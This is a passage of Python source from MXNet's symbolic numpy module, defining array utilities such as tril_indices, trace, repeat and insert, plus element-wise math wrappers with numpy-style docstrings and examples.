returned arrays will be valid. By default `m` is taken equal to `n`. Returns ------- inds : tuple of _Symbol The indices for the triangle. The returned tuple contains two arrays, each with the indices along one dimension of the array. See also -------- triu_indices : similar function, for upper-triangular. mask_indices : generic function accepting an arbitrary mask function. tril, triu Notes ----- .. versionadded:: 1.4.0 Examples -------- Compute two different sets of indices to access 4x4 arrays, one for the lower triangular part starting at the main diagonal, and one starting two diagonals further right: >>> il1 = np.tril_indices(4) >>> il2 = np.tril_indices(4, 2) Here is how they can be used with a sample array: >>> a = np.arange(16).reshape(4, 4) >>> a array([[ 0, 1, 2, 3], [ 4, 5, 6, 7], [ 8, 9, 10, 11], [12, 13, 14, 15]]) Both for indexing: >>> a[il1] array([ 0, 4, 5, 8, 9, 10, 12, 13, 14, 15]) And for assigning values: >>> a[il1] = -1 >>> a array([[-1, 1, 2, 3], [-1, -1, 6, 7], [-1, -1, -1, 11], [-1, -1, -1, -1]]) These cover almost the whole array (two diagonals right of the main one): >>> a[il2] = -10 >>> a array([[-10, -10, -10, 3], [-10, -10, -10, -10], [-10, -10, -10, -10], [-10, -10, -10, -10]]) """ if m is None: m = n return _npi.tril_indices(n, k, m) @set_module('mxnet.symbol.numpy') def trace(a, offset=0, axis1=0, axis2=1, out=None): """ Return the sum along diagonals of the array. If `a` is 2-D, the sum along its diagonal with the given offset is returned, i.e., the sum of elements ``a[i,i+offset]`` for all i. If `a` has more than two dimensions, then the axes specified by axis1 and axis2 are used to determine the 2-D sub-arrays whose traces are returned. The shape of the resulting array is the same as that of `a` with `axis1` and `axis2` removed. Parameters ---------- a : _Symbol Input array, from which the diagonals are taken. offset : int, optional Offset of the diagonal from the main diagonal. Can be both positive and negative. Defaults to 0. axis1, axis2 : int, optional Axes to be used as the first and second axis of the 2-D sub-arrays from which the diagonals should be taken. Defaults are the first two axes of `a`. out : _Symbol Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- sum_along_diagonals : _Symbol If `a` is 2-D, the sum along the diagonal is returned. If `a` has larger dimensions, then an array of sums along diagonals is returned. """ return _npi.trace(a, offset=offset, axis1=axis1, axis2=axis2, out=out) @set_module('mxnet.symbol.numpy') def transpose(a, axes=None): """ Permute the dimensions of an array. Parameters ---------- a : _Symbol Input array. axes : list of ints, optional By default, reverse the dimensions, otherwise permute the axes according to the values given. Returns ------- p : _Symbol a with its axes permuted. """ return _npi.transpose(a, axes=axes) @set_module('mxnet.symbol.numpy') def tri(N, M=None, k=0, dtype=None, ctx=None): r""" An array with ones at and below the given diagonal and zeros elsewhere. Parameters ---------- N : int Number of rows in the array. M : int, optional Number of columns in the array. By default, `M` is taken equal to `N`. k : int, optional The sub-diagonal at and below which the array is filled. `k` = 0 is the main diagonal, while `k` < 0 is below it, and `k` > 0 is above. The default is 0. dtype : dtype, optional Data type of the returned array. The default is float. Returns ------- tri : Symbol of shape (N, M) Array with its lower triangle filled with ones and zero elsewhere; in other words ``T[i,j] == 1`` for ``i <= j + k``, 0 otherwise. """ if dtype is None: dtype = 'float32' if M is None: M = N if ctx is None: ctx = current_context() return _npi.tri(N, M, k, dtype, ctx) def repeat(a, repeats, axis=None): """ Repeat elements of an array. Parameters ---------- a : array_like Input array. repeats : int The number of repetitions for each element. axis : int, optional The axis along which to repeat values. By default, use the flattened input array, and return a flat output array. Returns ------- repeated_array : ndarray Output array which has the same shape as `a`, except along the given axis. See Also -------- tile : Tile an array. Examples -------- >>> np.repeat(3, 4) array([3, 3, 3, 3]) >>> x = np.array([[1,2],[3,4]]) >>> np.repeat(x, 2) array([1, 1, 2, 2, 3, 3, 4, 4]) >>> np.repeat(x, 3, axis=1) array([[1, 1, 1, 2, 2, 2], [3, 3, 3, 4, 4, 4]]) >>> np.repeat(x, [1, 2], axis=0) array([[1, 2], [3, 4], [3, 4]]) """ if isinstance(repeats, numeric_types): repeats = [repeats] if axis is not None: tmp = swapaxes(a, 0, axis) res = _npi.repeats(tmp, repeats=repeats, axis=0) return swapaxes(res, 0, axis) return _npi.repeats(a, repeats=repeats, axis=axis) def _unary_func_helper(x, fn_array, fn_scalar, out=None, **kwargs): """Helper function for unary operators. Parameters ---------- x : _Symbol or scalar Input of the unary operator. fn_array : function Function to be called if x is of ``_Symbol`` type. fn_scalar : function Function to be called if x is a Python scalar. out : _Symbol Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- out : _Symbol or scalar Result _Symbol or scalar. """ if isinstance(x, numeric_types): return fn_scalar(x, **kwargs) elif isinstance(x, _Symbol): return fn_array(x, out=out, **kwargs) else: raise TypeError('type {} not supported'.format(str(type(x)))) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def sin(x, out=None, **kwargs): r""" Trigonometric sine, element-wise. Parameters ---------- x : _Symbol or scalar Angle, in radians (:math:`2 \pi` rad equals 360 degrees). out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol The sine of each element of x. This is a scalar if `x` is a scalar. Notes ---- This function only supports input type of float. """ return _unary_func_helper(x, _npi.sin, _np.sin, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def cos(x, out=None, **kwargs): r""" Cosine, element-wise. Parameters ---------- x : _Symbol or scalar Angle, in radians (:math:`2 \pi` rad equals 360 degrees). out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol The corresponding cosine values. This is a scalar if x is a scalar. Notes ---- This function only supports input type of float. """ return _unary_func_helper(x, _npi.cos, _np.cos, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def sinh(x, out=None, **kwargs): """ Hyperbolic sine, element-wise. Equivalent to ``1/2 * (np.exp(x) - np.exp(-x))`` or ``-1j * np.sin(1j*x)``. Parameters ---------- x : _Symbol or scalar Input array or scalar. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar The corresponding hyperbolic sine values. This is a scalar if `x` is a scalar. Notes ---- This function only supports input type of float. """ return _unary_func_helper(x, _npi.sinh, _np.sinh, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def cosh(x, out=None, **kwargs): """ Hyperbolic cosine, element-wise. Equivalent to ``1/2 * (np.exp(x) + np.exp(-x))`` and ``np.cos(1j*x)``. Parameters ---------- x : _Symbol or scalar Input array or scalar. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar The corresponding hyperbolic cosine values. This is a scalar if `x` is a scalar. Notes ---- This function only supports input type of float. """ return _unary_func_helper(x, _npi.cosh, _np.cosh, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def tanh(x, out=None, **kwargs): """ Compute hyperbolic tangent element-wise. Equivalent to ``np.sinh(x)/np.cosh(x)``. Parameters ---------- x : _Symbol Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol The corresponding hyperbolic tangent values. Notes ----- If `out` is provided, the function writes the result into it, and returns a reference to `out`. (See Examples) - input x does not support complex computation (like imaginary number) >>> np.tanh(np.pi*1j) TypeError: type <type 'complex'> not supported Examples -------- >>> np.tanh(np.array[0, np.pi])) array([0. , 0.9962721]) >>> np.tanh(np.pi) 0.99627207622075 >>> # Example of providing the optional output parameter illustrating >>> # that what is returned is a reference to said parameter >>> out1 = np.array(1) >>> out2 = np.tanh(np.array(0.1), out1) >>> out2 is out1 True >>> # Example of ValueError due to provision of shape mis-matched `out` >>> np.tanh(np.zeros((3,3)),np.zeros((2,2))) mxnet.base.MXNetError: [07:17:36] ../src/ndarray/./../operator/tensor/../elemwise_op_common.h:135: Check failed: assign(&dattr, vec.at(i)): Incompatible attr in node at 0-th output: expected [3,3], got [2,2] """ return _unary_func_helper(x, _npi.tanh, _np.tanh, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def log10(x, out=None, **kwargs): """ Return the base 10 logarithm of the input array, element-wise. Parameters ---------- x : _Symbol or scalar Input array or scalar. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar The logarithm to the base 10 of `x`, element-wise. NaNs are returned where x is negative. This is a scalar if `x` is a scalar. Notes ---- This function only supports input type of float. """ return _unary_func_helper(x, _npi.log10, _np.log10, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def sqrt(x, out=None, **kwargs): """ Return the non-negative square-root of an array, element-wise. Parameters ---------- x : _Symbol or scalar The values whose square-roots are required. out : _Symbol, or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar An array of the same shape as `x`, containing the positive square-root of each element in `x`. This is a scalar if `x` is a scalar. Notes ---- This function only supports input type of float. """ return _unary_func_helper(x, _npi.sqrt, _np.sqrt, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def cbrt(x, out=None, **kwargs): r""" Return the cube-root of an array, element-wise. Parameters ---------- x : _Symbol The values whose cube-roots are required. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ---------- y : _Symbol An array of the same shape as x, containing the cube cube-root of each element in x. If out was provided, y is a reference to it. This is a scalar if x is a scalar. """ return _unary_func_helper(x, _npi.cbrt, _np.cbrt, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def abs(x, out=None, **kwargs): r""" Calculate the absolute value element-wise. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- absolute : _Symbol An ndarray containing the absolute value of each element in `x`. This is a scalar if `x` is a scalar. """ return _unary_func_helper(x, _npi.abs, _np.abs, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def fabs(x, out=None, **kwargs): r""" Calculate the absolute value element-wise. This function returns the absolute values (positive magnitude) of the data in `x`. Complex values are not handled, use `absolute` to find the absolute values of complex data. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- absolute : _Symbol An ndarray containing the absolute value of each element in `x`. This is a scalar if `x` is a scalar. """ return _unary_func_helper(x, _npi.abs, _np.abs, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def absolute(x, out=None, **kwargs): r""" Calculate the absolute value element-wise. np.abs is a shorthand for this function. Parameters ---------- x : _Symbol Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ---------- absolute : _Symbol An ndarray containing the absolute value of each element in x. """ return _unary_func_helper(x, _npi.absolute, _np.absolute, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def sign(x, out=None, **kwargs): r""" Returns an element-wise indication of the sign of a number. The `sign` function returns ``-1 if x < 0, 0 if x==0, 1 if x > 0``. Only supports real number. Parameters ---------- x : _Symbol or a scalar Input values. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol The sign of `x`. This is a scalar if `x` is a scalar. Note ------- - Only supports real number as input elements. - Input type does not support Python native iterables(list, tuple, ...) - ``out`` param: cannot perform auto broadcasting. ``out`` symbol's shape must be the same as the expected output. - ``out`` param: cannot perform auto type cast. ``out`` symbol's dtype must be the same as the expected output. - ``out`` param does not support scalar input case. """ return _unary_func_helper(x, _npi.sign, _np.sign, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def exp(x, out=None, **kwargs): r""" Calculate the exponential of all elements in the input array. Parameters ---------- x : _Symbol or scalar Input values. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- out : _Symbol Output array, element-wise exponential of `x`. This is a scalar if `x` is a scalar. """ return _unary_func_helper(x, _npi.exp, _np.exp, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def expm1(x, out=None, **kwargs): r""" Calculate `exp(x) - 1` for all elements in the array. Parameters ---------- x : _Symbol or scalar Input values. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- out : _Symbol Output array, . This is a scalar if `x` is a scalar. """ return _unary_func_helper(x, _npi.expm1, _np.expm1, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def arcsin(x, out=None, **kwargs): r""" Inverse sine, element-wise. Parameters ---------- x : _Symbol or scalar The values whose reciprocals are required. out : _Symbol, or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- angle : _Symbol or scalar Output array is same shape and type as x. This is a scalar if x is a scalar. Notes ----- `arcsin` is a multivalued function: for each `x` there are infinitely many numbers `z` such that :math:`sin(z) = x`. The convention is to return the angle `z` whose real part lies in [-pi/2, pi/2]. For real-valued input data types, *arcsin* always returns real output. For each value that cannot be expressed as a real number or infinity, it yields ``nan`` and sets the `invalid` floating point error flag. The inverse sine is also known as `asin` or sin^{-1}. The output `symbol` has the same `ctx` as the input `symbol`. This function differs from the original `numpy.arcsin <https://docs.scipy.org/doc/numpy/reference/generated/numpy.arcsin.html>`_ in the following aspects: - Only support _Symbol or scalar now. - `where` argument is not supported. - Complex input is not supported. References ---------- Abramowitz, M. and Stegun, I. A., *Handbook of Mathematical Functions*, 10th printing, New York: Dover, 1964, pp. 79ff. http://www.math.sfu.ca/~cbm/aands/ """ return _unary_func_helper(x, _npi.arcsin, _np.arcsin, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def arccos(x, out=None, **kwargs): r""" Trigonometric inverse cosine, element-wise. The inverse of cos so that, if y = cos(x), then x = arccos(y). Parameters ---------- x : _Symbol x-coordinate on the unit circle. For real arguments, the domain is [-1, 1]. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ---------- angle : _Symbol The angle of the ray intersecting the unit circle at the given x-coordinate in radians [0, pi]. This is a scalar if x is a scalar. See also ---------- cos, arctan, arcsin Notes ---------- arccos is a multivalued function: for each x there are infinitely many numbers z such that cos(z) = x. The convention is to return the angle z whose real part lies in [0, pi]. For real-valued input data types, arccos always returns real output. For each value that cannot be expressed as a real number or infinity, it yields nan and sets the invalid floating point error flag. The inverse cos is also known as acos or cos^-1. """ return _unary_func_helper(x, _npi.arccos, _np.arccos, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def arctan(x, out=None, **kwargs): r""" Trigonometric inverse tangent, element-wise. The inverse of tan, so that if ``y = tan(x)`` then ``x = arctan(y)``. Parameters ---------- x : _Symbol or scalar Input values. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- out : _Symbol Out has the same shape as `x`. It lies is in ``[-pi/2, pi/2]`` (``arctan(+/-inf)`` returns ``+/-pi/2``). This is a scalar if `x` is a scalar. Notes ----- `arctan` is a multi-valued function: for each `x` there are infinitely many numbers `z` such that tan(`z`) = `x`. The convention is to return the angle `z` whose real part lies in [-pi/2, pi/2]. For real-valued input data types, `arctan` always returns real output. For each value that cannot be expressed as a real number or infinity, it yields ``nan`` and sets the `invalid` floating point error flag. For complex-valued input, we do not have support for them yet. The inverse tangent is also known as `atan` or tan^{-1}. """ return _unary_func_helper(x, _npi.arctan, _np.arctan, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def log(x, out=None, **kwargs): """ Natural logarithm, element-wise. The natural logarithm `log` is the inverse of the exponential function, so that `log(exp(x)) = x`. The natural logarithm is logarithm in base `e`. Parameters ---------- x : _Symbol Input value. Elements must be of real value. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol The natural logarithm of `x`, element-wise. This is a scalar if `x` is a scalar. Notes ----- Currently only supports data of real values and ``inf`` as input. Returns data of real value, ``inf``, ``-inf`` and ``nan`` according to the input. This function differs from the original `numpy.log <https://docs.scipy.org/doc/numpy/reference/generated/numpy.log.html>`_ in the following aspects: - Does not support complex number for now - Input type does not support Python native iterables(list, tuple, ...). Only ndarray is supported. - ``out`` param: cannot perform auto braodcasting. ``out`` symbol's shape must be the same as the expected output. - ``out`` param: cannot perform auto type cast. ``out`` symbol's dtype must be the same as the expected output. - ``out`` param does not support scalar input case. """ return _unary_func_helper(x, _npi.log, _np.log, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def degrees(x, out=None, **kwargs): """ Convert angles from radians to degrees. Parameters ---------- x : _Symbol Input value. Elements must be of real value. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol of floats The corresponding degree values; if `out` was supplied this is a reference to it. This is a scalar if `x` is a scalar. Notes ------- This function differs from the original `numpy.degrees <https://docs.scipy.org/doc/numpy/reference/generated/numpy.degrees.html>`_ in the following aspects: - Input type does not support Python native iterables(list, tuple, ...). Only ndarray is supported. - ``out`` param: cannot perform auto broadcasting. ``out`` symbol's shape must be the same as the expected output. - ``out`` param: cannot perform auto type cast. ``out`` symbol's dtype must be the same as the expected output. - ``out`` param does not support scalar input case. """ return _unary_func_helper(x, _npi.degrees, _np.degrees, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def rad2deg(x, out=None, **kwargs): r""" Convert angles from radians to degrees. Parameters ---------- x : _Symbol or scalar Angles in degrees. out : _Symbol or None, optional A location into which the result is stored. Returns ------- y : _Symbol or scalar The corresponding angle in radians. This is a scalar if `x` is a scalar. Notes ----- "rad2deg(x)" is "x * 180 / pi". This function differs from the original numpy.arange in the following aspects: - Only support float32 and float64. - `out` must be in the same size of input. """ return _unary_func_helper(x, _npi.rad2deg, _np.rad2deg, out=out) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def rint(x, out=None, **kwargs): """ Round elements of the array to the nearest integer. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- out : _Symbol or scalar Output array is same shape and type as x. This is a scalar if x is a scalar. Notes ----- This function differs from the original `numpy.rint <https://docs.scipy.org/doc/numpy/reference/generated/numpy.rint.html>`_ in the following way(s): - only _Symbol or scalar is accpted as valid input, tuple of _Symbol is not supported - broadcasting to `out` of different shape is currently not supported - when input is plain python numerics, the result will not be stored in the `out` param """ return _unary_func_helper(x, _npi.rint, _np.rint, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def log2(x, out=None, **kwargs): """ Base-2 logarithm of x. Parameters ---------- x : _Symbol Input values. out : _Symbol or None A location into which the result is stored. If provided, it must have the same shape and type as the input. If not provided or None, a freshly-allocated array is returned. Returns ------- y : _Symbol The logarithm base two of `x`, element-wise. This is a scalar if `x` is a scalar. Notes ----- This function differs from the original `numpy.log2 <https://www.google.com/search?q=numpy+log2>`_ in the following way(s): - only ndarray or scalar is accpted as valid input, tuple of ndarray is not supported - broadcasting to `out` of different shape is currently not supported - when input is plain python numerics, the result will not be stored in the `out` param """ return _unary_func_helper(x, _npi.log2, _np.log2, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def log1p(x, out=None, **kwargs): """ Return the natural logarithm of one plus the input array, element-wise. Calculates ``log(1 + x)``. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar Natural logarithm of 1 + x, element-wise. This is a scalar if x is a scalar. Notes ----- For real-valued input, `log1p` is accurate also for `x` so small that `1 + x == 1` in floating-point accuracy. Logarithm is a multivalued function: for each `x` there is an infinite number of `z` such that `exp(z) = 1 + x`. The convention is to return the `z` whose imaginary part lies in `[-pi, pi]`. For real-valued input data types, `log1p` always returns real output. For each value that cannot be expressed as a real number or infinity, it yields ``nan`` and sets the `invalid` floating point error flag. cannot support complex-valued input. Examples -------- >>> np.log1p(1e-99) 1e-99 >>> a = np.array([3, 4, 5]) >>> np.log1p(a) array([1.3862944, 1.609438 , 1.7917595]) """ return _unary_func_helper(x, _npi.log1p, _np.log1p, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def radians(x, out=None, **kwargs): """ Convert angles from degrees to radians. Parameters ---------- x : _Symbol or scalar Input array in degrees. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol The corresponding radian values. This is a scalar if x is a scalar. Notes ----- This function differs from the original `numpy.radians <https://docs.scipy.org/doc/numpy/reference/generated/numpy.radians.html>`_ in the following way(s): - only _Symbol or scalar is accpted as valid input, tuple of _Symbol is not supported - broadcasting to `out` of different shape is currently not supported - when input is plain python numerics, the result will not be stored in the `out` param Examples -------- >>> deg = np.arange(12.) * 30. >>> np.radians(deg) array([0. , 0.5235988, 1.0471976, 1.5707964, 2.0943952, 2.6179938, 3.1415927, 3.6651914, 4.1887903, 4.712389 , 5.2359877, 5.7595863], dtype=float32) """ return _unary_func_helper(x, _npi.radians, _np.radians, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def deg2rad(x, out=None, **kwargs): r""" deg2rad(x, out=None) Convert angles from degrees to radians. Parameters ---------- x : _Symbol or scalar Angles in degrees. out : _Symbol or None, optional A location into which the result is stored. Returns ------- y : _Symbol or scalar The corresponding angle in radians. This is a scalar if `x` is a scalar. Notes ----- "deg2rad(x)" is "x * pi / 180". This function differs from the original numpy.arange in the following aspects: - Only support float32 and float64. - `out` must be in the same size of input. """ return _unary_func_helper(x, _npi.deg2rad, _np.deg2rad, out=out) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def reciprocal(x, out=None, **kwargs): r""" Return the reciprocal of the argument, element-wise. Calculates ``1/x``. Parameters ---------- x : _Symbol or scalar The values whose reciprocals are required. out : _Symbol, or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar Output array is same shape and type as x. This is a scalar if x is a scalar. Notes ----- .. note:: This function is not designed to work with integers. For integer arguments with absolute value larger than 1 the result is always zero because of the way Python handles integer division. For integer zero the result is an overflow. The output `symbol` has the same `ctx` as the input `symbol`. This function differs from the original `numpy.reciprocal <https://docs.scipy.org/doc/numpy/reference/generated/numpy.reciprocal.html>`_ in the following aspects: - Only support _Symbol and scalar now. - `where` argument is not supported. """ return _unary_func_helper(x, _npi.reciprocal, _np.reciprocal, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def square(x, out=None, **kwargs): r""" Return the element-wise square of the input. Parameters ---------- x : _Symbol or scalar The values whose reciprocals are required. out : _Symbol, or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar Output array is same shape and type as x. This is a scalar if x is a scalar. Notes ----- The output `symbol` has the same `ctx` as the input `symbol`. This function differs from the original `numpy.square <https://docs.scipy.org/doc/numpy/reference/generated/numpy.square.html>`_ in the following aspects: - Only support _Symbol and scalar now. - `where` argument is not supported. """ return _unary_func_helper(x, _npi.square, _np.square, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def negative(x, out=None, **kwargs): r""" Numerical negative, element-wise. Parameters: ------------ x : _Symbol or scalar Input array. out : _Symbol or None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or None, a freshly-allocated array is returned. A tuple (possible only as a keyword argument) must have length equal to the number of outputs. Returns: ------- y : _Symbol or scalar Returned array or scalar: y = -x. This is a scalar if x is a scalar. Examples: --------- >>> np.negative(1) -1 """ return _unary_func_helper(x, _npi.negative, _np.negative, out=out) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def fix(x, out=None, **kwargs): """ Round to nearest integer towards zero. Round an array of floats element-wise to nearest integer towards zero. The rounded values are returned as floats. Parameters: ---------- x : _Symbol or scalar An array of floats to be rounded out : _Symbol or scalar, optional Output array Returns: --------- y : _Symbol or scalar Examples: ---------- >>> np.fix(3.14) 3 """ return _unary_func_helper(x, _npi.fix, _np.fix, out=out) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def tan(x, out=None, **kwargs): r""" Compute tangent element-wise. Equivalent to np.sin(x)/np.cos(x) element-wise. Parameters: ---------- x : _Symbol or scalar Input array. out : _Symbol or scalar or None. A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or None, a freshly-allocated array is returned. A tuple (possible only as a keyword argument) must have length equal to the number of outputs. Returns: ------- y : _Symbol or scalar The corresponding tangent values. This is a scalar if x is a scalar. """ return _unary_func_helper(x, _npi.tan, _np.tan, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def ceil(x, out=None, **kwargs): r""" Return the ceiling of the input, element-wise. The ceil of the ndarray `x` is the smallest integer `i`, such that `i >= x`. It is often denoted as :math:`\lceil x \rceil`. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar The ceiling of each element in `x`, with `float` dtype. This is a scalar if `x` is a scalar. Examples -------- >>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0]) >>> np.ceil(a) array([-1., -1., -0., 1., 2., 2., 2.]) >>> #if you use parameter out, x and out must be ndarray. if not, you will get an error! >>> a = np.array(1) >>> np.ceil(np.array(3.5), a) array(4.) >>> a array(4.) """ return _unary_func_helper(x, _npi.ceil, _np.ceil, out=out, **kwargs) @set_module('mxnet.symbol.numpy') def insert(arr, obj, values, axis=None): """ Insert values along the given axis before the given indices. Parameters ---------- arr : _Symbol Input array. obj : int, slice or ndarray of int64 Object that defines the index or indices before which `values` is inserted. Support for multiple insertions when `obj` is a single scalar or a sequence with one element (only support int32 and int64 element). values : _Symbol Values to insert into `arr`. If the type of values is different from that of arr, values is converted to the type of arr. axis : int, optional Axis along which to insert `values`. If `axis` is None then `arr` is flattened first. Returns ------- out : _Symbol A copy of `arr` with `values` inserted. Note that `insert` does not occur in-place: a new array is returned. If `axis` is None, `out` is a flattened array. Notes ----- - Note that for higher dimensional inserts `obj=0` behaves very different from `obj=[0]` just like `arr[:,0,:] = values` is different from `arr[:,[0],:] = values`. - If obj is a ndarray, it's dtype only supports int64 """ if isinstance(values, numeric_types): if isinstance(obj, slice): start = obj.start stop = obj.stop step = 1 if obj.step is None else obj.step return _npi.insert_slice(arr, val=values, start=start, stop=stop, step=step, axis=axis) elif isinstance(obj, integer_types): return _npi.insert_scalar(arr, val=values, int_ind=obj, axis=axis) elif isinstance(obj, Symbol): return _npi.insert_tensor(arr, obj, val=values, axis=axis) if not isinstance(arr, Symbol): # pylint: disable= undefined-variable raise TypeError("'arr' can not support type {}".format(str(type(arr)))) if not isinstance(values, Symbol): # pylint: disable= undefined-variable raise TypeError("'values' can not support type {}".format(str(type(values)))) if isinstance(obj, slice): start = obj.start stop = obj.stop step = 1 if obj.step is None else obj.step return _npi.insert_slice(arr, values, start=start, stop=stop, step=step, axis=axis) elif isinstance(obj, integer_types): return _npi.insert_scalar(arr, values, int_ind=obj, axis=axis) elif isinstance(obj, Symbol): return _npi.insert_tensor(arr, values, obj, axis=axis) else: raise TypeError("'obj' can not support type {}".format(str(type(obj)))) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def floor(x, out=None, **kwargs): r""" Return the floor of the input, element-wise. The floor of the ndarray `x` is the largest integer `i`, such that `i <= x`. It is often denoted as :math:`\lfloor x \rfloor`. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar The floor of each element in `x`, with `float` dtype. This is a scalar if `x` is a scalar. Examples -------- >>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0]) >>> np.floor(a) array([-2., -2., -1., 0., 1., 1., 2.]) >>> # if you use parameter out, x and out must be ndarray. if not, you will get an error! >>> a = np.array(1) >>> np.floor(np.array(3.5), a) array(3.) >>> a array(3.) """ return _unary_func_helper(x, _npi.floor, _np.floor, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def trunc(x, out=None, **kwargs): r""" Return the truncated value of the input, element-wise. The truncated value of the scalar `x` is the nearest integer `i` which is closer to zero than `x` is. In short, the fractional part of the signed number `x` is discarded. Parameters ---------- x : _Symbol or scalar Input data. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar The truncated value of each element in `x`. This is a scalar if `x` is a scalar. Notes ----- This function differs from the original numpy.trunc in the following aspects: - Do not support `where`, a parameter in numpy which indicates where to calculate. - Cannot cast type automatically. Dtype of `out` must be same as the expected one. - Cannot broadcast automatically. Shape of `out` must be same as the expected one. - If `x` is plain python numeric, the result won't be stored in out. """ return _unary_func_helper(x, _npi.trunc, _np.trunc, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def logical_not(x, out=None, **kwargs): r""" Compute the truth value of NOT x element-wise. Parameters ---------- x : _Symbol or scalar Logical NOT is applied to the elements of `x`. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : bool or _Symbol Boolean result with the same shape as `x` of the NOT operation on elements of `x`. This is a scalar if `x` is a scalar. Notes ----- This function differs from the original numpy.logical_not in the following aspects: - Do not support `where`, a parameter in numpy which indicates where to calculate. - Cannot cast type automatically. Dtype of `out` must be same as the expected one. - Cannot broadcast automatically. Shape of `out` must be same as the expected one. - If `x` is plain python numeric, the result won't be stored in out. """ return _unary_func_helper(x, _npi.logical_not, _np.logical_not, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def arcsinh(x, out=None, **kwargs): r""" Inverse hyperbolic sine, element-wise. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- arcsinh : _Symbol Array of the same shape as `x`. This is a scalar if `x` is a scalar. Notes ----- `arcsinh` 